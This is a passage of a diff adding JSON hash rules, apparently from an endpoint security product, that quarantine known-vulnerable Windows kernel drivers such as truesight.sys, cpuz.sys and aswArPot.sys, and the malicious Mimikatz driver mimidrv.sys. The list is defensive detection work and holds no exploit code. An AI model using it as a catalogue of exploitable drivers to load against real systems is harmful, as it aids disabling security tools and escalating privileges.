+ "creation_date": "2026-03-23T11:45:31.472756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472765Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e013f794babd59b9703ac2d199beb1d91a5c2908b30ba4ef60a6e4f12a5e8cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df850812-e935-54cf-9aa4-752a31d006e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462764Z",
+ "creation_date": "2026-03-23T11:45:30.462767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfa4b45d-a628-5a53-b344-c7628f177973",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494510Z",
+ "creation_date": "2026-03-23T11:45:31.494512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5406ab98add13a7d31161488cdf92e910caf97be72122167898a3d6115d73a4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfaffc60-7408-5454-ac5e-fa6f78673c1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472752Z",
+ "creation_date": "2026-03-23T11:45:30.472756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9695940f72e3ed5d7369fb32958e2146abd29d5895d91ccc22dfbcc9485b78b",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfb4f748-09ee-5f59-bd03-a308c2c388ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473396Z",
+ "creation_date": "2026-03-23T11:45:30.473399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b01ebea651ec7780d0fe88dd1b6c2500a36dacf85e3a4038c2ca1c5cb44c7b5d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfb58b5d-6f99-53ad-8de0-eb76f2e54ae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494745Z",
+ "creation_date": "2026-03-23T11:45:31.494747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f05a2cf863c80be0a142bf81fd46e3d8964ff6fad8430cbac63469552179b14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfbf7a4f-6516-59f7-8992-09226ff8e35a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819865Z",
+ "creation_date": "2026-03-23T11:45:31.819884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819893Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe490ce5dee1028d46673a2bafa96952a320b8f9fe988c8fefcf1a1fdcbbcd36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfc61591-6b9d-5ed1-82e1-20c522b5ba47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981523Z",
+ "creation_date": "2026-03-23T11:45:29.981526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbebf6d463c2dbf61836b3eba09b643e1d79a02652a32482ca58894703b9addb",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfc82f78-9f9b-54af-8eaf-f02d52bcd90f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488708Z",
+ "creation_date": "2026-03-23T11:45:31.488710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7480a9e5a0339f755820432d7e14acfcd6f2d20012bbdd599f67d123b79c3fda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfca525e-287b-5827-b6cb-f83cada3cd32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151705Z",
+ "creation_date": "2026-03-23T11:45:31.151708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ceb3473a819cb39ec750f1ce21c563b49b6df8d973644f758ca979cb96eb2e73",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfcb957e-8f0e-58a2-ae7e-8bca3bc1518d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986178Z",
+ "creation_date": "2026-03-23T11:45:29.986180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f20ac5dac9171857fc5791865458fdb6eac4fab837d7eabc42cb0a83cb522fc",
+ "comment": "Vulnerable Kernel Driver (aka pchunter.sys) [https://www.loldrivers.io/drivers/73290fcb-a0d7-481e-81a5-65a9859b50f5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfd5e0c9-88da-588c-b360-f4e513e87f47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465426Z",
+ "creation_date": "2026-03-23T11:45:30.465429Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfd8be6c-24f7-570b-8dbb-c48f19b17fa5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140838Z",
+ "creation_date": "2026-03-23T11:45:31.140840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2503a559f90fd20870802a67b241d45e50c4f3be20b569a1c78bfe390ad1c4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfdaa7a4-b2d6-5fe6-b20e-b5ad61ab82b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612735Z",
+ "creation_date": "2026-03-23T11:45:29.612737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "028aed97e90c5a231069a3fa0853c67ea5853c4bbfea6247c6f4b53509581d05",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dfdea1c0-e3ef-5240-a187-8db5ada278af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832586Z",
+ "creation_date": "2026-03-23T11:45:30.832588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "825756750ca654e55536cc9ac53c9c090f943723e1dc88c5d8179f0001eab105",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e013bc0d-6b3d-5666-aecd-ad906f0a9f7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969802Z",
+ "creation_date": "2026-03-23T11:45:29.969804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "968258fe6b307a7887465c7fb0a0b7b45f973b91deb8638af1428d247430d777",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e01990f0-d241-5db4-8cec-875462735a5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810521Z",
+ "creation_date": "2026-03-23T11:45:31.810524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09ed697c9fc0b66ddcb2839b6ba82088d5a9f7ce307ebab83524888606211d10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e020bb92-1ebe-55bf-8d3b-31e1f949fcfd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142018Z",
+ "creation_date": "2026-03-23T11:45:31.142020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d896a44696d3bc40219956db058238a269911a053eaf6eb4b43bf28efe1c07d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e022fcc0-e179-51c6-b7ee-2e31eaad95a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477804Z",
+ "creation_date": "2026-03-23T11:45:31.477808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbb597b01dd0323a6f59bf873635662802971080d9fb74b1d5dcfe86ad1d09a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e02381bc-a11f-5e6a-939d-0389175edc40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822936Z",
+ "creation_date": "2026-03-23T11:45:30.822938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822943Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6208a115fc72bc9014c7debb188c473c41f64e7ffeb3efbd31af6c48c0726702",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e028b319-84c1-57ad-a8fe-9cac6e110c29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493275Z",
+ "creation_date": "2026-03-23T11:45:31.493277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea1a63aa063f1cd46cccd934fb3a6b5c0cf7e37bc79ca53eb6d5a39eefcfcd6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e037fa8e-345e-5606-b4b4-6d8fb0925e1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486668Z",
+ "creation_date": "2026-03-23T11:45:31.486671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12060b757db0d78a2c6603930b6b08e79a90937f5e7d81ea0086b86fb0155fb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e03dafb0-5ec0-5688-950d-1252cd95a83c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160666Z",
+ "creation_date": "2026-03-23T11:45:31.160668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
